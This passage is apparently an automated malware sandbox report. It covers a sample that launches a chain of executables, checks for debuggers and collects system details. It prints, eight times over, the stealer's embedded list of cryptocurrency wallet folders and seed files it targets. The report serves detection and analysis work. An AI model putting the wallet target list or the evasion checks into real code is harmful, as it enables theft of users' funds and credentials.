                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeCode function: 8_2_0537092E rdtsc 8_2_0537092E
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040CDE3
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,14_2_00402A50
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_0011652B mov eax, dword ptr fs:[00000030h]12_2_0011652B
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_0011A302 mov eax, dword ptr fs:[00000030h]12_2_0011A302
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_047A7D41 push dword ptr fs:[00000030h]14_2_047A7D41
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_04950D90 mov eax, dword ptr fs:[00000030h]14_2_04950D90
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0495092B mov eax, dword ptr fs:[00000030h]14_2_0495092B
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00418592 GetProcessHeap,14_2_00418592
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00409A2A
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040CDE3
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040A58A
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0040A720 SetUnhandledExceptionFilter,14_2_0040A720
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_04959C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_04959C91
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0495A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0495A7F1
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0495D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0495D04A
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0495A987 SetUnhandledExceptionFilter,14_2_0495A987
                      Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7732, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBGIDAAF.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsIIEBGIDAAF.exe "C:\Users\user\DocumentsIIEBGIDAAF.exe" Jump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe "C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe" Jump to behavior
                      Source: skotes.exeBinary or memory string: ,#Program Manager
                      Source: file.exe, file.exe, 00000001.00000002.1956491090.0000000000A25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: mProgram Manager
                      Source: DocumentsIIEBGIDAAF.exe, 00000008.00000002.1994569621.0000000000FF8000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000009.00000002.2025405033.00000000002D8000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000A.00000002.2037796544.00000000002D8000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: #Program Manager
                      Source: 607f096cd3.exeBinary or memory string: @Program Manager
                      Source: 607f096cd3.exe, 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: @Program Manager
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_000FD3E2 cpuid 12_2_000FD3E2
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_000FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,12_2_000FCBEA
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_000E65E0 LookupAccountNameA,12_2_000E65E0

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 12.2.skotes.exe.e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.skotes.exe.e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.skotes.exe.e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.DocumentsIIEBGIDAAF.exe.e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000003.1997212194.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2037671976.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1994320392.0000000000E01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.1951715692.0000000005170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2525179171.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2025296435.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.1984502664.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 14.2.607f096cd3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.607f096cd3.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.607f096cd3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.607f096cd3.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2669859529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1441862159.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1955784660.0000000000651000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1957372627.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7732, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7732, type: MEMORYSTR
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
